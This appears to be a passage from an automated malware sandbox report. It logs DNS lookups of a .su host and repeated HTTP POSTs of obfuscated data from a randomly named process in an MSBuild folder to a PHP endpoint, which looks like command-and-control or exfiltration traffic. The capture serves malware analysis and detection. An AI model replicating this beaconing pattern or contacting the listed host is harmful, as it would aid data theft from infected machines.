                                                                                      Mar 6, 2024 09:53:45.800812006 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:45.909821033 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.909878969 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:45.910088062 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.147289038 CET804981491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.174747944 CET804981491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.215131044 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.251547098 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.275571108 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.324584961 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.401724100 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.401840925 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.402792931 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.743104935 CET804981591.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.743164062 CET4981580192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.745549917 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.745621920 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.745827913 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:46.748068094 CET804981491.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:46.748114109 CET4981480192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.088705063 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.088721991 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.088987112 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.432326078 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.457406044 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.512031078 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.571053982 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.572041035 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.914024115 CET804981691.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.914078951 CET4981680192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.917052984 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:47.917238951 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:47.917309046 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:48.262315989 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:48.262368917 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:48.262454033 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:48.309061050 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:48.607675076 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:48.636464119 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:48.683959961 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:48.760512114 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:48.761409998 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.105637074 CET804981791.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.105870008 CET4981780192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.106252909 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.106362104 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.106528997 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.451358080 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.451417923 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.451735020 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.796807051 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.826376915 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:49.871464014 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.945061922 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:49.945981979 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:50.287578106 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:50.287668943 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:50.287842989 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:50.289940119 CET804981891.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:50.290021896 CET4981880192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:50.629374981 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:50.629435062 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:50.629688978 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:50.971345901 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.001543999 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.043339968 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.116729021 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.117422104 CET4982080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.189150095 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.307717085 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.458476067 CET804981991.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.458600044 CET4981980192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.460331917 CET804982091.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.460408926 CET4982080192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.531666040 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.531769037 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.532035112 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.651010990 CET804982291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.651206970 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.651314020 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.874351025 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.874411106 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.879584074 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:51.994483948 CET804982291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.994503975 CET804982291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:51.994788885 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.226296902 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.253804922 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.293318987 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.338419914 CET804982291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.367233992 CET804982291.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.418319941 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.491945982 CET4982280192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.491940975 CET4982180192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.493108988 CET4982380192.168.2.491.227.16.11
                                                                                      Mar 6, 2024 09:53:52.834415913 CET804982191.227.16.11192.168.2.4
                                                                                      Mar 6, 2024 09:53:52.834542036 CET4982180192.168.2.491.227.16.11
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 6, 2024 09:52:29.982539892 CET | 55429 | 53 | 192.168.2.4 | 1.1.1.1
Mar 6, 2024 09:52:30.980777979 CET | 55429 | 53 | 192.168.2.4 | 1.1.1.1
Mar 6, 2024 09:52:31.642987013 CET | 53 | 55429 | 1.1.1.1 | 192.168.2.4
Mar 6, 2024 09:52:31.643016100 CET | 53 | 55429 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 6, 2024 09:52:29.982539892 CET | 192.168.2.4 | 1.1.1.1 | 0x1dc4 | Standard query (0) | h172956.srv11.test-hf.su | A (IP address) | IN (0x0001) | false
Mar 6, 2024 09:52:30.980777979 CET | 192.168.2.4 | 1.1.1.1 | 0x1dc4 | Standard query (0) | h172956.srv11.test-hf.su | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 6, 2024 09:52:31.642987013 CET | 1.1.1.1 | 192.168.2.4 | 0x1dc4 | No error (0) | h172956.srv11.test-hf.su | | 91.227.16.11 | A (IP address) | IN (0x0001) | false
Mar 6, 2024 09:52:31.643016100 CET | 1.1.1.1 | 192.168.2.4 | 0x1dc4 | No error (0) | h172956.srv11.test-hf.su | | 91.227.16.11 | A (IP address) | IN (0x0001) | false
                                                                                      • h172956.srv11.test-hf.su
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe

Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:52:31.999098063 CET | 347 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: h172956.srv11.test-hf.su
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Mar 6, 2024 09:52:32.348309040 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:52:32.812009096 CET | 1286 | IN | HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Wed, 06 Mar 2024 08:52:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.33
X-Power-Supply-By: 220 Volt
Mar 6, 2024 09:52:32.864692926 CET | 323 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: h172956.srv11.test-hf.su
Content-Length: 384
Expect: 100-continue
Mar 6, 2024 09:52:33.231373072 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:52:33.584662914 CET | 435 | IN | HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Wed, 06 Mar 2024 08:52:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.33
X-Power-Supply-By: 220 Volt
Mar 6, 2024 09:52:33.617494106 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: h172956.srv11.test-hf.su
Content-Length: 1868
Expect: 100-continue
Mar 6, 2024 09:52:33.964373112 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:52:34.335834980 CET | 435 | IN | HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Wed, 06 Mar 2024 08:52:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.33
X-Power-Supply-By: 220 Volt


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49736 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe

Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:52:33.318561077 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: h172956.srv11.test-hf.su
Content-Length: 2548
Expect: 100-continue
Mar 6, 2024 09:52:33.661731005 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:52:34.034509897 CET | 286 | IN | HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Wed, 06 Mar 2024 08:52:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.33
X-Power-Supply-By: 220 Volt
Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
Data Ascii: 40YWU0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49739 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe

Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:52:34.573467016 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: h172956.srv11.test-hf.su
Content-Length: 2548
Expect: 100-continue
Mar 6, 2024 09:52:34.914844990 CET | 25 | IN | HTTP/1.1 100 Continue
Mar 6, 2024 09:52:35.285372972 CET | 286 | IN | HTTP/1.1 200 OK
Server: nginx/1.14.1
Date: Wed, 06 Mar 2024 08:52:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Keep-Alive: timeout=20
Vary: Accept-Encoding
X-Powered-By: PHP/7.3.33
X-Power-Supply-By: 220 Volt
Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
Data Ascii: 40YWU0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49740 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe

Timestamp | Bytes transferred | Direction | Data
Mar 6, 2024 09:52:35.762254953 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
Host: h172956.srv11.test-hf.su
Content-Length: 2548
Expect: 100-continue
Mar 6, 2024 09:52:36.107430935 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:36.479062080 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:36 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      4 | 192.168.2.4 | 49742 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:36.987514019 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:37.333208084 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:37.333544016 CET | 2548 | OUT | Data Raw: 51 5e 54 5a 5b 56 55 5c 5e 57 5a 51 57 51 50 5c 54 53 54 59 56 5f 57 5a 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: Q^TZ[VU\^WZQWQP\TSTYV_WZQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,1' &39/Y>$0'9V5+5$$(%2\8)%Z"!Q*
                                                                                      Mar 6, 2024 09:52:37.707859993 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:37 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      5 | 192.168.2.4 | 49743 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:38.187553883 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:38.532499075 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:38.532763958 CET | 2548 | OUT | Data Raw: 54 51 51 5d 5b 56 55 54 5e 57 5a 51 57 5d 50 5b 54 51 54 59 56 5f 57 5c 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: TQQ][VUT^WZQW]P[TQTYV_W\QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9/1%'&%5/Y2'8(%_0"?(5<$$+%Z2Z;%Z"!Q*9
                                                                                      Mar 6, 2024 09:52:38.906996012 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:38 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      6 | 192.168.2.4 | 49745 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:39.398377895 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:39.741556883 CET | 25 | IN | HTTP/1.1 100 Continue


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      7 | 192.168.2.4 | 49746 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:39.685349941 CET | 348 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 1868
                                                                                      Expect: 100-continue
                                                                                      Connection: Keep-Alive
                                                                                      Mar 6, 2024 09:52:40.028506994 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:40.087990999 CET | 1868 | OUT | Data Raw: 54 5e 51 5e 5e 5b 55 56 5e 57 5a 51 57 5d 50 5c 54 53 54 5b 56 54 57 5b 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T^Q^^[UV^WZQW]P\TST[VTW[QZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X:,6W$1\'&%-/$+32"P5< '4%>\/9%Z"!Q*9
                                                                                      Mar 6, 2024 09:52:40.459626913 CET | 435 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:40 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 39 38 0d 0a 02 11 2d 02 27 2b 3c 09 20 20 20 51 29 13 04 12 29 57 2e 13 28 06 07 1a 2a 3f 35 00 3b 39 3c 1e 2b 06 30 19 23 11 3c 50 23 21 01 0b 31 03 20 5c 05 11 27 5e 30 1c 3d 5b 26 29 29 10 33 32 2d 5f 26 06 33 41 28 02 22 59 33 29 37 5c 37 0d 28 55 32 04 34 01 24 2f 0b 5e 2d 10 33 5f 31 17 2d 54 02 17 21 08 27 13 23 00 2b 20 3b 5d 26 21 3d 58 3e 03 24 52 21 17 2c 1e 22 1d 0c 00 26 2b 3e 5e 21 54 3b 59 3f 16 0a 05 25 2c 23 0f 27 3e 23 55 22 00 2c 52 0e 3f 5c 57 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 98-'+< Q))W.(*?5;9<+0#<P#!1 \'^0=[&))32-_&3A("Y3)7\7(U24$/^-3_1-T!'#+ ;]&!=X>$R!,"&+>^!T;Y?%,#'>#U",R?\W0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      8 | 192.168.2.4 | 49747 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:40.437248945 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                                                      Host: h172956.srv11.test-hf.su
                                                                                      Content-Length: 2548
                                                                                      Expect: 100-continue
                                                                                      Mar 6, 2024 09:52:40.779300928 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                      Mar 6, 2024 09:52:40.779640913 CET | 2548 | OUT | Data Raw: 54 5c 51 5e 5b 5b 50 53 5e 57 5a 51 57 5d 50 52 54 57 54 5c 56 5b 57 59 51 5a 59 5e 52 58 5f 57 44 5d 50 44 5b 5a 53 52 5f 50 5a 5f 5e 5b 5f 59 53 5d 5d 5e 5a 53 5b 52 5a 5b 57 5d 5f 54 52 58 58 5e 5c 40 56 5a 58 5f 5f 5c 5d 59 5e 52 5e 51 5b 5b
                                                                                      Data Ascii: T\Q^[[PS^WZQW]PRTWT\V[WYQZY^RX_WD]PD[ZSR_PZ_^[_YS]]^ZS[RZ[W]_TRXX^\@VZX__\]Y^R^Q[[U]Z^Z\SXY][[WVT\]VY_GZUWDY]PZXT^_S_\^T_Q^[[TYZ\S][UX][YPV[^^YTX[PY[WZ[Y]XYQCR]CP[IRVXUQ]T\S^\VB^PXBX_X9;!T$13&/&3+&9V6$V57]&742Z&[8)%Z"!Q*9
                                                                                      Mar 6, 2024 09:52:41.148926020 CET | 286 | IN | HTTP/1.1 200 OK
                                                                                      Server: nginx/1.14.1
                                                                                      Date: Wed, 06 Mar 2024 08:52:40 GMT
                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      Keep-Alive: timeout=20
                                                                                      Vary: Accept-Encoding
                                                                                      X-Powered-By: PHP/7.3.33
                                                                                      X-Power-Supply-By: 220 Volt
                                                                                      Data Raw: 34 0d 0a 30 59 57 55 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 40YWU0


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      9 | 192.168.2.4 | 49749 | 91.227.16.11 | 80 | 4520 | C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Mar 6, 2024 09:52:44.264975071 CET | 324 | OUT | POST /providerVmjs_PollAuthapiBasecdndownloads.php HTTP/1.1
                                                                                      Content-Type: application/octet-stream
